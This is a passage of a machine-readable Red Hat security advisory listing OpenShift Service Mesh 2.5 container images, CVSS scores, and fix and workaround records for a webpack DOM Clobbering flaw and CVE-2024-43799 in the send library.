"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.1, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", version: "3.1", }, products: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", }, { cve: "CVE-2024-43799", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:30.869487+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311153", }, ], notes: [ { category: "description", text: "A flaw was found in the Send library. This vulnerability allows remote code execution via untrusted input passed to the SendStream.redirect() function.", title: "Vulnerability description", }, { category: "summary", text: "send: Code Execution Vulnerability in Send Library", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43799", }, { category: "external", summary: "RHBZ#2311153", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311153", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43799", url: "https://www.cve.org/CVERecord?id=CVE-2024-43799", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43799", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43799", }, { category: "external", summary: "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35", url: "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35", }, { category: "external", summary: "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg", url: "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg", }, ], release_date: "2024-09-10T15:15:17.727000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:53+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7725", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", 